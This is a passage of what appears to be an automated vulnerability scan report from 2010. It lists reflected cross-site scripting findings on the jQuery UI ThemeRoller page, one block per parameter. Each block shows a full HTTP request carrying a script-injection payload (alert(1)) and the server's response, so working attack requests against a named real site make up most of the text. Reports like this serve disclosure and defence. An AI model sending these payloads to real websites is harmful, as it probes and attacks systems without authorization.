GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa58ea6"><script>alert(1)</script>28e30971b21&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:05 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1273e"><script>alert(1)</script>cd77f13a13f was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa11273e"><script>alert(1)</script>cd77f13a13f&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:47 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22e57"><script>alert(1)</script>1a584325653 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=99999922e57"><script>alert(1)</script>1a584325653&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 804ed"><script>alert(1)</script>575a5646092 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px804ed"><script>alert(1)</script>575a5646092&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:00 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload efa69"><script>alert(1)</script>b707c48f40 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxefa69"><script>alert(1)</script>b707c48f40 HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:30:11 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120064
The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902d3"><script>alert(1)</script>d640d8b9ce9 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121902d3"><script>alert(1)</script>d640d8b9ce9&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36b5d"><script>alert(1)</script>44fc3456acc was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=22222236b5d"><script>alert(1)</script>44fc3456acc&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:14 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f8a1"><script>alert(1)</script>0008e70e4e1 was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=5555555f8a1"><script>alert(1)</script>0008e70e4e1&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf4c2"><script>alert(1)</script>73651ee13b2 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0acf4c2"><script>alert(1)</script>73651ee13b2&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:56 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68a94"><script>alert(1)</script>14458d207cd was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=22222268a94"><script>alert(1)</script>14458d207cd&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:06 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922fd"><script>alert(1)</script>bfebabdeafa was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636922fd"><script>alert(1)</script>bfebabdeafa&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:49 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 567ab"><script>alert(1)</script>6bb62385672 was submitted in the fcHover parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121567ab"><script>alert(1)</script>6bb62385672&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:29:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3de9"><script>alert(1)</script>10d22a8c27a was submitted in the ffDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serife3de9"><script>alert(1)</script>10d22a8c27a&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1 Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 14 Nov 2010 23:28:57 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 Content-Length: 120067
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ba6c"><script>alert(1)</script>6024da5fef4 was submitted in the fsDefault parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em1ba6c"><script>alert(1)</script>6024da5fef4&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fc